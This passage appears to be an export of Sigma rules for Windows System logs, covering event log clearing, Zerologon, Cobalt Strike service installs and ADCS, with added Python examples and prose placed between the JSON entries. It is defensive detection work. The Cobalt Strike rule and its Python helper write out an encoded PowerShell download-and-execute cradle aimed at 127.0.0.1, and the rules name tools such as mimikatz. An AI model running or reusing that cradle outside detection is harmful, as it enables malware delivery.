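     "ClientAddress": "0200C3507F0000010000000000000000"},                 # raw 127.0.0.1, filtered
    {"EventID": 4000, "ShareName": "\\\\*\\IPC$", "SigningUsed": "false",
     "EncyptionUsed": "false", "ClientAddress": IPV6_LINK_LOCAL_RAW},      # link-local, filtered
    {"EventID": 4000, "ShareName": "\\\\*\\C$", "SigningUsed": "true",
     "EncyptionUsed": "true", "ClientAddress": "10.20.30.41"},            # signed and encrypted
    {"EventID": 4000, "ShareName": "\\\\*\\Public", "SigningUsed": "false",
     "EncyptionUsed": "false", "ClientAddress": "10.20.30.42"},           # not a sensitive share
]


def matching_events(events=SAMPLE_EVENTS):
    """Compressed client addresses of the events the rule logic fires on."""
    return [decode_client_address(e["ClientAddress"]).compressed
            for e in events if is_hit(e)]


if __name__ == "__main__":
    print(matching_events())
```

Decoding the blob before the CIDR test is what the rule's `contains` patterns approximate with `0200????7F`: the two port bytes vary per connection, so only a structural parse (or a wildcard) can anchor the address bytes reliably.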
  {
    "path": "rules/windows/builtin/system/application_popup/win_system_application_sysmon_crash.yml",
    "content": "title: Sysmon Application Crashed\nid: 4d7f1827-1637-4def-8d8a-fd254f9454df\nstatus: test\ndescription: Detects application popup reporting a failure of the Sysmon service\nreferences:\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36\nauthor: Tim Shelton\ndate: 2022-04-26\nmodified: 2024-01-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Application Popup'\n        EventID: 26\n        Caption:\n            - 'sysmon64.exe - Application Error'\n            - 'sysmon.exe - Application Error'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml",
    "content": "title: NTLMv1 Logon Between Client and Server\nid: e9d4ab66-a532-4ef7-a502-66a9e4a34f5d\nstatus: test\ndescription: Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.\nreferences:\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml\nauthor: Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-04-26\nmodified: 2023-06-06\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1550.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: \"LsaSrv\"\n        EventID:\n            - 6038\n            - 6039\n    condition: selection\nfalsepositives:\n    - Environments that use NTLMv1\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_Iphlpsvc/win_system_isatap_router_address_set.yml",
    "content": "title: ISATAP Router Address Was Set\nid: d22df9cd-2aee-4089-93c7-9dc4eae77f2c\nstatus: experimental\ndescription: |\n    Detects the configuration of a new ISATAP router on a Windows host. While ISATAP is a legitimate Microsoft technology for IPv6 transition, unexpected or unauthorized ISATAP router configurations could indicate a potential IPv6 DNS Takeover attack using tools like mitm6.\n    In such attacks, adversaries advertise themselves as DHCPv6 servers and set malicious ISATAP routers to intercept traffic.\n    This detection should be correlated with network baselines and known legitimate ISATAP deployments in your environment.\nreferences:\n    - https://www.blackhillsinfosec.com/mitm6-strikes-again-the-dark-side-of-ipv6/\n    - https://redfoxsec.com/blog/ipv6-dns-takeover/\n    - https://www.securityhq.com/blog/malicious-isatap-tunneling-unearthed-on-windows-server/\n    - https://medium.com/@ninnesoturan/detecting-ipv6-dns-takeover-a54a6a88be1f\nauthor: hamid\ndate: 2025-10-19\ntags:\n    - attack.impact\n    - attack.credential-access\n    - attack.collection\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.t1557\n    - attack.t1565.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 4100\n        Provider_Name: 'Microsoft-Windows-Iphlpsvc'\n    filter_main_localhost:\n        IsatapRouter:\n            - '127.0.0.1'\n            - '::1'\n    filter_optional_null:\n        IsatapRouter: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate ISATAP router configuration in enterprise environments\n    - IPv6 transition projects and network infrastructure changes\n    - Network administrators configuring dual-stack networking\n    - Automatic ISATAP configuration in some Windows deployments\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_certification_authority/win_system_adcs_enrollment_request_denied.yml",
    "content": "title: Active Directory Certificate Services Denied Certificate Enrollment Request\nid: 994bfd6d-0a2e-481e-a861-934069fcf5f5\nstatus: test\ndescription: |\n    Detects denied requests by Active Directory Certificate Services.\n    Examples of such denials include issues with permissions on the certificate template or invalid signatures.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10)\n    - https://www.gradenegger.eu/en/details-of-the-event-with-id-53-of-the-source-microsoft-windows-certificationauthority/\nauthor: '@SerkinValery'\ndate: 2024-03-07\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Microsoft-Windows-CertificationAuthority'\n        EventID: 53\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml",
    "content": "title: DHCP Server Loaded the CallOut DLL\nid: 13fc89a9-971e-4ca6-b9dc-aa53a445bf40\nstatus: test\ndescription: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded\nreferences:\n    - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html\n    - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx\n    - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx\nauthor: Dimitrios Slamaris\ndate: 2017-05-15\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 1033\n        Provider_Name: Microsoft-Windows-DHCP-Server\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml",
    "content": "title: DHCP Server Error Failed Loading the CallOut DLL\nid: 75edd3fd-7146-48e5-9848-3013d7f0282c\nstatus: test\ndescription: This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded\nreferences:\n    - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html\n    - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx\n    - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx\nauthor: 'Dimitrios Slamaris, @atc_project (fix)'\ndate: 2017-05-15\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID:\n            - 1031\n            - 1032\n            - 1034\n        Provider_Name: Microsoft-Windows-DHCP-Server\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml",
    "content": "title: Local Privilege Escalation Indicator TabTip\nid: bc2e25ed-b92b-4daa-b074-b502bdd1982b\nstatus: test\ndescription: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode\nreferences:\n    - https://github.com/antonioCoco/JuicyPotatoNG\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-07\nmodified: 2023-04-14\ntags:\n    - attack.collection\n    - attack.execution\n    - attack.credential-access\n    - attack.t1557.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Microsoft-Windows-DistributedCOM'\n        EventID: 10001\n        param1: 'C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe'  # Binary starting/started\n        param2: 2147943140                                                       # ERROR id\n        param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}'                         # DCOM Server\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml",
    "content": "title: Eventlog Cleared\nid: a62b37e0-45d3-48d9-a517-90c1a1b0186b\nrelated:\n    - id: f2f01843-e7b8-4f95-a35a-d23584476423\n      type: obsolete\n    - id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982\n      type: derived\n    - id: 100ef69e-3327-481c-8e5c-6d80d9507556\n      type: derived\nstatus: test\ndescription: One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution\nreferences:\n    - https://twitter.com/deviouspolack/status/832535435960209408\n    - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-01-10\nmodified: 2023-11-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.001\n    - car.2016-04-002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 104\n        Provider_Name: 'Microsoft-Windows-Eventlog'\n    filter_main_covered:\n        # The channels below are already covered by the rule 100ef69e-3327-481c-8e5c-6d80d9507556\n        Channel:\n            - 'Microsoft-Windows-PowerShell/Operational'\n            - 'Microsoft-Windows-Sysmon/Operational'\n            - 'PowerShellCore/Operational'\n            - 'Security'\n            - 'System'\n            - 'Windows PowerShell'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)\n    - System provisioning (system reset before the golden image creation)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml",
    "content": "title: Important Windows Eventlog Cleared\nid: 100ef69e-3327-481c-8e5c-6d80d9507556\nrelated:\n    - id: a62b37e0-45d3-48d9-a517-90c1a1b0186b\n      type: derived\nstatus: test\ndescription: Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution\nreferences:\n    - https://twitter.com/deviouspolack/status/832535435960209408\n    - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100\nauthor: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-17\nmodified: 2023-11-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.001\n    - car.2016-04-002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 104\n        Provider_Name: 'Microsoft-Windows-Eventlog'\n        Channel:\n            - 'Microsoft-Windows-PowerShell/Operational'\n            - 'Microsoft-Windows-Sysmon/Operational'\n            - 'PowerShellCore/Operational'\n            - 'Security'\n            - 'System'\n            - 'Windows PowerShell'\n    condition: selection\nfalsepositives:\n    - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)\n    - System provisioning (system reset before the golden image creation)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml",
    "content": "title: Certificate Use With No Strong Mapping\nid: 993c2665-e6ef-40e3-a62a-e1a97686af79\nstatus: test\ndescription: |\n    Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID)\n    This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping.\n    Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.\nreferences:\n    - https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16\nauthor: '@br4dy5'\ndate: 2023-10-09\nmodified: 2025-09-22\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name:\n            - 'Kerberos-Key-Distribution-Center'\n            - 'Microsoft-Windows-Kerberos-Key-Distribution-Center'\n        EventID:\n            - 39\n            - 41 # For Windows Server 2008 R2 SP1 and Windows Server 2008 SP2\n    condition: selection\nfalsepositives:\n    - If prevalent in the environment, filter on events where the AccountName and CN of the Subject do not reference the same user\n    - If prevalent in the environment, filter on CNs that end in a dollar sign indicating it is a machine name\nlevel: medium\n"
  },
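The falsepositives guidance of the rule above amounts to a triage step: of the KDC 39/41 events the rule surfaces, the ones worth an analyst's attention are those where the certificate's subject CN is not the account it was mapped to, or where the CN ends in a dollar sign (a machine account). The following Python is an added example, not part of the Sigma repository: it applies the rule's selection and that triage to constructed events. The field names AccountName and Subject are taken from the rule's own wording and are an assumption about how your collector names the event data; the DN format and all sample values are constructed.

```python
from __future__ import annotations

import re

# Added example (not part of the Sigma repository): applies the
# "Certificate Use With No Strong Mapping" rule and the triage checks from
# its description/falsepositives to constructed KDC events.

KDC_PROVIDERS = {
    "Kerberos-Key-Distribution-Center",
    "Microsoft-Windows-Kerberos-Key-Distribution-Center",
}
KDC_EVENT_IDS = {39, 41}

# Assumption: the mapped account and certificate subject arrive as the
# fields 'AccountName' and 'Subject' (the names the rule's falsepositives
# use); check your collector's EventData names before relying on them.


def rule_matches(event: dict) -> bool:
    """The rule's selection: KDC provider and EventID 39 or 41."""
    return event.get("Provider_Name") in KDC_PROVIDERS and event.get("EventID") in KDC_EVENT_IDS


def subject_cn(subject: str) -> str | None:
    """Leaf CN of an X.500 subject such as 'CN=jdoe, OU=Users, DC=corp, DC=local'.
    Escaped commas (\\,) inside the RDN value are kept as part of the value."""
    match = re.match(r"\s*CN=((?:\\.|[^,])*)", subject, re.IGNORECASE)
    return match.group(1).strip() if match else None


def account_name(principal: str) -> str:
    """'CORP\\jdoe' or 'jdoe@corp.local' -> 'jdoe'."""
    name = principal.rsplit("\\", 1)[-1]
    return name.split("@", 1)[0]


def triage(event: dict) -> str:
    """'not_applicable' if the rule does not fire; otherwise 'cn_mismatch'
    (subject CN is not the mapped account), 'machine_cn' (CN ends in '$'),
    or 'consistent' (the case the falsepositives suggest filtering out)."""
    if not rule_matches(event):
        return "not_applicable"
    cn = subject_cn(event.get("Subject", "")) or ""
    if cn.casefold() != account_name(event.get("AccountName", "")).casefold():
        return "cn_mismatch"
    if cn.endswith("$"):
        return "machine_cn"
    return "consistent"


def flagged(events: list[dict]) -> list[tuple[int, str]]:
    """Indices and verdicts of the events an analyst should look at."""
    out = []
    for index, ev in enumerate(events):
        verdict = triage(ev)
        if verdict in ("cn_mismatch", "machine_cn"):
            out.append((index, verdict))
    return out


# Constructed sample events (not captured log data).
SAMPLE_EVENTS = [
    {"Provider_Name": "Microsoft-Windows-Kerberos-Key-Distribution-Center", "EventID": 39,
     "AccountName": "CORP\\jdoe", "Subject": "CN=jdoe, OU=Users, DC=corp, DC=local"},
    {"Provider_Name": "Microsoft-Windows-Kerberos-Key-Distribution-Center", "EventID": 39,
     "AccountName": "CORP\\jdoe", "Subject": "CN=Administrator, CN=Users, DC=corp, DC=local"},
    {"Provider_Name": "Microsoft-Windows-Kerberos-Key-Distribution-Center", "EventID": 39,
     "AccountName": "CORP\\DC01$", "Subject": "CN=DC01$, OU=Domain Controllers, DC=corp, DC=local"},
    {"Provider_Name": "Kerberos-Key-Distribution-Center", "EventID": 41,
     "AccountName": "svc-backup@corp.local", "Subject": "CN=svc-backup, OU=Service Accounts, DC=corp, DC=local"},
    {"Provider_Name": "Microsoft-Windows-Security-Auditing", "EventID": 4768,
     "AccountName": "CORP\\jdoe", "Subject": ""},
]


if __name__ == "__main__":
    for index, verdict in flagged(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[index]
        print(index, verdict, ev["AccountName"], "<-", ev["Subject"])
```

Only the second and third sample events come back flagged; the first and fourth are the "same user" case the rule's falsepositives tell you to filter when event 39 is noisy, and the last one never enters the rule. Keep the rule's own level (medium) for the unfiltered stream and raise the flagged subset if you route it separately.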
  {
    "path": "rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml",
    "content": "title: No Suitable Encryption Key Found For Generating Kerberos Ticket\nid: b1e0b3f5-b62e-41be-886a-daffde446ad4\nstatus: test\ndescription: |\n    Detects errors when a target server doesn't have suitable keys for generating kerberos tickets.\n    This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd348773(v=ws.10)\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/kdc-event-16-27-des-encryption-disabled\nauthor: '@SerkinValery'\ndate: 2024-03-07\nmodified: 2025-09-22\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name:\n            - 'Kerberos-Key-Distribution-Center'\n            - 'Microsoft-Windows-Kerberos-Key-Distribution-Center'\n        EventID:\n            - 16 # KDCEVENT_NO_KEY_INTERSECTION_TGS\n            - 27 # KDCEVENT_UNSUPPORTED_ETYPE_REQUEST_TGS\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_kernel_general/win_system_susp_critical_hive_location_access_bits_cleared.yml",
    "content": "title: Critical Hive In Suspicious Location Access Bits Cleared\nid: 39f919f3-980b-4e6f-a975-8af7e507ef2b\nrelated:\n    - id: 839dd1e8-eda8-4834-8145-01beeee33acd\n      type: obsolete\nstatus: test\ndescription: |\n    Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system-like hive name located in the temp directory have been reset.\n    This occurs when an application tries to access a hive and the hive has not been recognized within the last 7 days (by default).\n    Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.\nreferences:\n    - https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-15\nmodified: 2024-01-18\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 16\n        Provider_Name: Microsoft-Windows-Kernel-General\n        HiveName|contains:\n            - '\\Temp\\SAM'\n            - '\\Temp\\SECURITY'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_ntfs/win_system_volume_shadow_copy_mount.yml",
    "content": "title: Volume Shadow Copy Mount\nid: f512acbf-e662-4903-843e-97ce4652b740\nstatus: test\ndescription: Detects volume shadow copy mount via Windows event log\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)\ndate: 2020-10-20\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: Microsoft-Windows-Ntfs\n        EventID: 98\n        DeviceName|contains: HarddiskVolumeShadowCopy\n    condition: selection\nfalsepositives:\n    - Legitimate use of volume shadow copy mounts (backups maybe).\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_wer_systemerrorreporting/win_system_crash_dump_created.yml",
    "content": "title: Crash Dump Created By Operating System\nid: 882fbe50-d8d7-4e29-ae80-0648a8556866\nrelated:\n    - id: 2ff692c2-4594-41ec-8fcb-46587de769e0\n      type: similar\nstatus: experimental\ndescription: Detects \"BugCheck\" errors indicating the system rebooted due to a crash, capturing the bugcheck code, dump file path, and report ID.\nreferences:\n    - https://www.sans.edu/cyber-research/from-crash-compromise-unlocking-potential-windows-crash-dumps-offensive-security/\n    - https://jasonmull.com/articles/offensive/2025-05-12-windows-crash-dumps-offensive-security/\nauthor: Jason Mull\ndate: 2025-05-12\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1003.002\n    - attack.t1005\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Microsoft-Windows-WER-SystemErrorReporting'\n        EventID: 1001\n    condition: selection\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml",
    "content": "title: Windows Update Error\nid: 13cfeb75-9e33-4d04-b0f7-ab8faaa95a59\nstatus: stable\ndescription: |\n    Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.\nreferences:\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml\nauthor: frack113\ndate: 2021-12-04\nmodified: 2023-09-07\ntags:\n    - attack.impact\n    - attack.resource-development\n    - attack.t1584\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: Microsoft-Windows-WindowsUpdateClient\n        EventID:\n            - 16 # Unable to Connect: Windows is unable to connect to the automatic updates service and therefore cannot download and install updates according to the set schedule\n            - 20 # Installation Failure: Windows failed to install the following update with error\n            - 24 # Uninstallation Failure: Windows failed to uninstall the following update with error\n            - 213 # Revert Failure: Windows failed to revert the following update with error\n            - 217 # Commit Failure: Windows failed to commit the following update with error\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml",
    "content": "title: Zerologon Exploitation Using Well-known Tools\nid: 18f37338-b9bd-4117-a039-280c81f7a596\nstatus: stable\ndescription: Detects attempts to exploit the Zerologon vulnerability (CVE-2020-1472) using the mimikatz zerologon module or other exploits run from a machine with the \"kali\" hostname.\nreferences:\n    - https://www.secura.com/blog/zero-logon\n    - https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382\nauthor: 'Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community'\ndate: 2020-10-13\nmodified: 2021-05-30\ntags:\n    - attack.t1210\n    - attack.lateral-movement\nlogsource:\n    service: system\n    product: windows\ndetection:\n    selection:\n        EventID:\n            - 5805\n            - 5723\n    keywords:\n        - kali\n        - mimikatz\n    condition: selection and keywords\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml",
    "content": "title: Vulnerable Netlogon Secure Channel Connection Allowed\nid: a0cb7110-edf0-47a4-9177-541a4083128a\nstatus: test\ndescription: Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.\nreferences:\n    - https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc\nauthor: NVISO\ndate: 2020-09-15\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: NetLogon  # Active Directory: NetLogon ETW GUID {F33959B4-DBEC-11D2-895B-00C04F79AB69}\n        EventID: 5829\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml",
    "content": "title: NTFS Vulnerability Exploitation\nid: f14719ce-d3ab-4e25-9ce6-2899092260b0\nstatus: test\ndescription: Detects the exploitation of an NTFS vulnerability, as reported without many details via Twitter\nreferences:\n    - https://twitter.com/jonasLyk/status/1347900440000811010\n    - https://twitter.com/wdormann/status/1347958161609809921\n    - https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-11\nmodified: 2022-12-25\ntags:\n    - attack.impact\n    - attack.t1499.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: Ntfs\n        EventID: 55\n        Origin: 'File System Driver'\n        Description|contains|all:\n            - 'contains a corrupted file record'\n            - 'The name of the file is \"\\\"'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml",
    "content": "title: CobaltStrike Service Installations - System\nid: 5a105d34-05fc-401e-8553-272b45c1522d\nstatus: test\ndescription: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement\nreferences:\n    - https://www.sans.org/webcasts/119395\n    - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/\n    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/\nauthor: Florian Roth (Nextron Systems), Wojciech Lesicki\ndate: 2021-05-26\nmodified: 2022-11-27\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_id:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection1:\n        ImagePath|contains|all:\n            - 'ADMIN$'\n            - '.exe'\n    selection2:\n        ImagePath|contains|all:\n            - '%COMSPEC%'\n            - 'start'\n            - 'powershell'\n    selection3:\n        ImagePath|contains: 'powershell -nop -w hidden -encodedcommand'\n    selection4:\n        ImagePath|base64offset|contains: \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:\"\n    condition: selection_id and (selection1 or selection2 or selection3 or selection4)\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
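The base64offset modifier in selection4 of the CobaltStrike service rule above is the part of that rule most worth understanding: the IEX stager string is base64-encoded at all three byte alignments and trimmed so that a fragment matches wherever the string sits inside a longer blob. The following Python is an added example, not code from the Sigma project: it reimplements that modifier, evaluates the rule's whole condition over constructed Service Control Manager 7045 events, and exposes one caveat a practitioner should check, namely that the rule as written applies base64offset to the raw (UTF-8) bytes of the string, while a PowerShell -EncodedCommand payload is UTF-16LE, so the `utf16le` switch controls which encoding the fragments are derived from. Event field names follow the rule (Provider_Name, EventID, ImagePath); the ImagePath values are constructed, not captured.

```python
from __future__ import annotations

import base64

# Added example (not part of the Sigma repository): evaluates the
# "CobaltStrike Service Installations - System" rule over constructed
# Service Control Manager 7045 events, including the base64offset modifier.

_START = (0, 2, 3)        # leading chars that depend on the unknown prefix bytes
_END = (None, -3, -2)     # trailing chars (plus '=' padding) that depend on what follows


def base64offset(value: bytes) -> list[str]:
    """Sigma 'base64offset' semantics: the value base64-encoded at all three
    byte alignments (0, 1, 2 filler bytes in front), trimmed so each fragment
    no longer depends on the bytes around it."""
    fragments = []
    for shift in range(3):
        encoded = base64.b64encode(b" " * shift + value).decode()
        fragments.append(encoded[_START[shift]:_END[(len(value) + shift) % 3]])
    return fragments


IEX_STAGER = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:"


def selection4(image_path: str, utf16le: bool) -> bool:
    """'ImagePath|base64offset|contains' for the IEX stager string. With
    utf16le=False this is what the rule as written computes (UTF-8 bytes);
    with utf16le=True it matches a PowerShell -EncodedCommand payload."""
    raw = IEX_STAGER.encode("utf-16-le" if utf16le else "utf-8")
    return any(fragment in image_path for fragment in base64offset(raw))


def cobaltstrike_service_rule(event: dict, utf16le: bool = False) -> bool:
    """selection_id and (selection1 or selection2 or selection3 or selection4)."""
    if event.get("Provider_Name") != "Service Control Manager" or event.get("EventID") != 7045:
        return False
    path = event.get("ImagePath", "")
    low = path.lower()  # Sigma plain-string matching is case-insensitive
    sel1 = "admin$" in low and ".exe" in low
    sel2 = all(s in low for s in ("%comspec%", "start", "powershell"))
    sel3 = "powershell -nop -w hidden -encodedcommand" in low
    return sel1 or sel2 or sel3 or selection4(path, utf16le)


def encoded_stager_path(prefix: str, port: int, utf16le: bool = True) -> str:
    """Constructed 7045 ImagePath (sample data, not a captured log line).
    `prefix` shifts the stager's byte alignment inside the blob so every
    base64offset variant gets exercised; the -ec form deliberately avoids
    the selection2/selection3 literals so only selection4 can fire."""
    script = f"{prefix}{IEX_STAGER}{port}/')"
    blob = base64.b64encode(script.encode("utf-16-le" if utf16le else "utf-8")).decode()
    return f"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -ec {blob}"


def scm_event(image_path: str) -> dict:
    """Minimal Service Control Manager 7045 event with the fields the rule uses."""
    return {"Provider_Name": "Service Control Manager", "EventID": 7045, "ImagePath": image_path}


if __name__ == "__main__":
    for prefix in ("", "x", "xx"):
        ev = scm_event(encoded_stager_path(prefix, 4444))
        print(repr(prefix), "utf16le:", cobaltstrike_service_rule(ev, utf16le=True),
              "raw bytes:", cobaltstrike_service_rule(ev, utf16le=False))
```

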